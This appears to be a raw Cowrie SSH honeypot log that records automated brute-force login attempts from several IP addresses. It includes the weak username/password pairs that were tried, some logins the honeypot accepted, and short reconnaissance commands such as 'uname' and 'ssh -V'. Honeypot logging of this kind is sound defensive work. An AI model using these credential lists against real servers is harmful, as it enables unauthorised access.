{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:15.012562Z","src_ip":"45.125.211.194","session":"020a552e09f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:15.211118Z","src_ip":"45.125.211.194","session":"020a552e09f2"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:16.099859Z","src_ip":"45.125.211.194","session":"020a552e09f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38261,"dst_ip":"1.2.3.4","dst_port":22,"session":"27e97edd8ac2","protocol":"ssh","message":"New connection: 212.227.235.229:38261 (1.2.3.4:22) [session: 27e97edd8ac2]","sensor":"my-vps","timestamp":"2025-08-28T03:19:16.454323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:16.968580Z","src_ip":"212.227.235.229","session":"27e97edd8ac2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:16.969475Z","src_ip":"212.227.235.229","session":"27e97edd8ac2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:17.323753Z","src_ip":"45.125.211.194","session":"020a552e09f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36866,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c76d2516450","protocol":"ssh","message":"New connection: 212.227.235.229:36866 (1.2.3.4:22) [session: 1c76d2516450]","sensor":"my-vps","timestamp":"2025-08-28T03:19:18.681113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:18.682067Z","src_ip":"212.227.235.229","session":"1c76d2516450"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:18.932690Z","src_ip":"212.227.235.229","session":"1c76d2516450"}
{"eventid":"cowrie.login.success","username":"root","password":"0886178631","message":"login attempt [root/0886178631] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:19:19.280419Z","src_ip":"212.227.235.229","session":"27e97edd8ac2"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:19.687130Z","src_ip":"212.227.235.229","session":"1c76d2516450"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:19:20.280913Z","src_ip":"212.227.235.229","session":"27e97edd8ac2"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T03:19:20.281613Z","src_ip":"212.227.235.229","session":"27e97edd8ac2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:20.824370Z","src_ip":"212.227.235.229","session":"27e97edd8ac2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:20.939996Z","src_ip":"212.227.235.229","session":"1c76d2516450"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:21.043340Z","src_ip":"212.227.235.229","session":"27e97edd8ac2"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":8620,"dst_ip":"1.2.3.4","dst_port":22,"session":"a685d028dfdc","protocol":"ssh","message":"New connection: 45.125.211.194:8620 (1.2.3.4:22) [session: a685d028dfdc]","sensor":"my-vps","timestamp":"2025-08-28T03:19:29.907136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:29.921560Z","src_ip":"45.125.211.194","session":"a685d028dfdc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:30.119096Z","src_ip":"45.125.211.194","session":"a685d028dfdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57744,"dst_ip":"1.2.3.4","dst_port":22,"session":"97b57bbe8f0c","protocol":"ssh","message":"New connection: 212.227.235.229:57744 (1.2.3.4:22) [session: 97b57bbe8f0c]","sensor":"my-vps","timestamp":"2025-08-28T03:19:30.382099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:30.382645Z","src_ip":"212.227.235.229","session":"97b57bbe8f0c"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":55784,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fa1eb9f3381","protocol":"ssh","message":"New connection: 194.233.79.134:55784 (1.2.3.4:22) [session: 2fa1eb9f3381]","sensor":"my-vps","timestamp":"2025-08-28T03:19:30.557667Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:30.573169Z","src_ip":"194.233.79.134","session":"2fa1eb9f3381"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:30.640613Z","src_ip":"212.227.235.229","session":"97b57bbe8f0c"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:30.958174Z","src_ip":"45.125.211.194","session":"a685d028dfdc"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:31.417093Z","src_ip":"212.227.235.229","session":"97b57bbe8f0c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:31.521792Z","src_ip":"194.233.79.134","session":"2fa1eb9f3381"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:32.170040Z","src_ip":"45.125.211.194","session":"a685d028dfdc"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:19:32.397480Z","src_ip":"194.233.79.134","session":"2fa1eb9f3381"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:32.677250Z","src_ip":"212.227.235.229","session":"97b57bbe8f0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:19:33.184673Z","src_ip":"194.233.79.134","session":"2fa1eb9f3381"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:19:33.185411Z","src_ip":"194.233.79.134","session":"2fa1eb9f3381"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:33.548568Z","src_ip":"194.233.79.134","session":"2fa1eb9f3381"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:33.549729Z","src_ip":"194.233.79.134","session":"2fa1eb9f3381"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39952,"dst_ip":"1.2.3.4","dst_port":22,"session":"d298ecba11e8","protocol":"ssh","message":"New connection: 212.227.235.229:39952 (1.2.3.4:22) [session: d298ecba11e8]","sensor":"my-vps","timestamp":"2025-08-28T03:19:36.455674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:36.456566Z","src_ip":"212.227.235.229","session":"d298ecba11e8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:36.708315Z","src_ip":"212.227.235.229","session":"d298ecba11e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:19:37.448491Z","src_ip":"212.227.235.229","session":"d298ecba11e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:19:38.042947Z","src_ip":"212.227.235.229","session":"d298ecba11e8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:19:38.043623Z","src_ip":"212.227.235.229","session":"d298ecba11e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:38.289980Z","src_ip":"212.227.235.229","session":"d298ecba11e8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:38.291136Z","src_ip":"212.227.235.229","session":"d298ecba11e8"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":28613,"dst_ip":"1.2.3.4","dst_port":22,"session":"b691eecec257","protocol":"ssh","message":"New connection: 45.125.211.194:28613 (1.2.3.4:22) [session: b691eecec257]","sensor":"my-vps","timestamp":"2025-08-28T03:19:44.762811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:44.763665Z","src_ip":"45.125.211.194","session":"b691eecec257"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:44.971283Z","src_ip":"45.125.211.194","session":"b691eecec257"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"!QAZ@wsx","message":"login attempt [oracle/!QAZ@wsx] failed","sensor":"my-vps","timestamp":"2025-08-28T03:19:45.596495Z","src_ip":"45.125.211.194","session":"b691eecec257"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:46.806272Z","src_ip":"45.125.211.194","session":"b691eecec257"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43038,"dst_ip":"1.2.3.4","dst_port":22,"session":"e39f2a6f5b68","protocol":"ssh","message":"New connection: 212.227.235.229:43038 (1.2.3.4:22) [session: e39f2a6f5b68]","sensor":"my-vps","timestamp":"2025-08-28T03:19:53.853975Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:19:53.854903Z","src_ip":"212.227.235.229","session":"e39f2a6f5b68"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22606,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dbb2a8f6fd0","protocol":"ssh","message":"New connection: 45.125.211.194:22606 (1.2.3.4:22) [session: 6dbb2a8f6fd0]","sensor":"my-vps","timestamp":"2025-08-28T03:19:59.476540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:19:59.490265Z","src_ip":"45.125.211.194","session":"6dbb2a8f6fd0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:19:59.693141Z","src_ip":"45.125.211.194","session":"6dbb2a8f6fd0"}
